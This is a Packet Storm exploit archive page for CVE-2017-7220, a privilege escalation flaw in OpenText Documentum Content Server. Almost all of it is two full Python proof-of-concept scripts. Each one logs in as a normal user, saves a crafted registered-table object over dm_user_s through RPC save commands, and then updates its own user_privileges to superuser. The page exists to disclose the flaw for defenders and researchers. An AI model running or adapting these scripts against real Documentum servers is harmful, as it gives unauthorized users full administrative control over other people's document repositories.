Twenty Year Anniversary

OpenText Documentum Content Server Privilege Evaluation

OpenText Documentum Content Server Privilege Evaluation
Posted Apr 19, 2017
Authored by Andrey B. Panfilov

OpenText Documentum Content Server suffers from a privilege evaluation issue using crafted RPC save commands. Two proof of concepts included.

tags | exploit, proof of concept
advisories | CVE-2017-7220
MD5 | 26b6a71c9dc0176316872546a0152528

OpenText Documentum Content Server Privilege Evaluation

Change Mirror Download
CVE-2017-7220-01.py:

#!/usr/bin/env python

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
print "usage:\n\t%s host port user password" % basename(sys.argv[0])


def main():
if len(sys.argv) != 5:
usage()
exit(1)

print "Trying to connect to %s:%s as %s ..." % (sys.argv[1], sys.argv[2], sys.argv[3])
(session, docbase) = create_session(*sys.argv[1:5])

if is_super_user(session):
print "Current user is a superuser, nothing to do"
exit(1)

print "Acquiring ID for malicious object ..."
id = session.next_id(25)
print "Acquired %s\nTrying to create following malicious object:" % id
obj = TypedObject(session=session)
obj.set_string("OBJECT_TYPE", "DM_REGISTERED")
obj.set_bool("IS_NEW_OBJECT", True)
obj.set_int("i_vstamp", 0)
obj.set_string("table_name", "dm_user_s")
obj.set_string("table_owner", docbase)
obj.set_string("owner_name", docbase)
obj.set_int("world_permit", 7)
obj.set_string("object_name", "dm_user_s")
obj.set_string("r_object_type", "dm_registered")
obj.set_int("owner_table_permit", 15)
obj.set_int("group_table_permit", 15)
obj.set_int("world_table_permit", 15)
print obj.dump()
r = session.sys_obj_save(id, obj)
if not r:
print "Failed"
exit(1)
print "Becoming superuser..."
r = session.query(
"UPDATE dm_dbo.dm_user_s SET user_privileges=16 "
"WHERE user_name=USER") \
.next_record()['rows_updated']
if r != 1:
print "Failed"
exit(1)
print "P0wned!"


def create_session(host, port, user, pwd, identity=None):
print "Trying to connect to %s:%s as %s ..." % \
(host, port, user)
session = None
try:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity)
except socket.error, e:
if e.errno == 54:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity,
secure=True, ciphers=CIPHERS)
else:
raise e
docbase = session.docbaseconfig['object_name']
version = session.serverconfig['r_server_version']
print "Connected to %s:%s, docbase: %s, version: %s" % \
(host, port, docbase, version)
return (session, docbase)


def is_super_user(session):
user = session.get_by_qualification(
"dm_user WHERE user_name=USER")
if user['user_privileges'] == 16:
return True
group = session.get_by_qualification(
"dm_group where group_name='dm_superusers' "
"AND any i_all_users_names=USER")
if group is not None:
return True

return False


if __name__ == '__main__':
main()


-------------------------------------

CVE-2017-7220-02.py:


#!/usr/bin/env python

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
print "usage:\n\t%s host port user password" % basename(sys.argv[0])


def main():
if len(sys.argv) != 5:
usage()
exit(1)

print "Trying to connect to %s:%s as %s ..." % (sys.argv[1], sys.argv[2], sys.argv[3])
(session, docbase) = create_session(*sys.argv[1:5])

if is_super_user(session):
print "Current user is a superuser, nothing to do"
exit(1)

print "Acquiring ID for malicious object ..."
id = session.next_id(0x00)
print "Acquired %s\nTrying to create following malicious object:" % id
obj = TypedObject(session=session)
obj.set_string("OBJECT_TYPE", "dm_registered")
obj.set_bool("IS_NEW_OBJECT", True)
obj.set_int("i_vstamp", 0)
obj.set_string("table_name", "dm_user_s")
obj.set_string("table_owner", docbase)
obj.set_string("owner_name", docbase)
obj.set_int("world_permit", 7)
obj.set_string("object_name", "dm_user_s")
obj.set_string("r_object_type", "dm_registered")
obj.set_int("owner_table_permit", 15)
obj.set_int("group_table_permit", 15)
obj.set_int("world_table_permit", 15)
print obj.dump()
if not session.save(id, obj):
print "Failed"
exit(1)
print "Becoming superuser..."
r = session.query(
"UPDATE dm_dbo.dm_user_s SET "
"user_privileges=16 WHERE user_name=USER") \
.next_record()[
'rows_updated']
if r != 1:
print "Failed"
exit(1)
print "P0wned!"


def create_session(host, port, user, pwd, identity=None):
print "Trying to connect to %s:%s as %s ..." % \
(host, port, user)
session = None
try:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity)
except socket.error, e:
if e.errno == 54:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity,
secure=True, ciphers=CIPHERS)
else:
raise e
docbase = session.docbaseconfig['object_name']
version = session.serverconfig['r_server_version']
print "Connected to %s:%s, docbase: %s, version: %s" % \
(host, port, docbase, version)
return (session, docbase)


def is_super_user(session):
user = session.get_by_qualification(
"dm_user WHERE user_name=USER")
if user['user_privileges'] == 16:
return True
group = session.get_by_qualification(
"dm_group where group_name='dm_superusers' "
"AND any i_all_users_names=USER")
if group is not None:
return True

return False


if __name__ == '__main__':
main()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    17 Files
  • 20
    Jul 20th
    11 Files
  • 21
    Jul 21st
    1 Files
  • 22
    Jul 22nd
    1 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close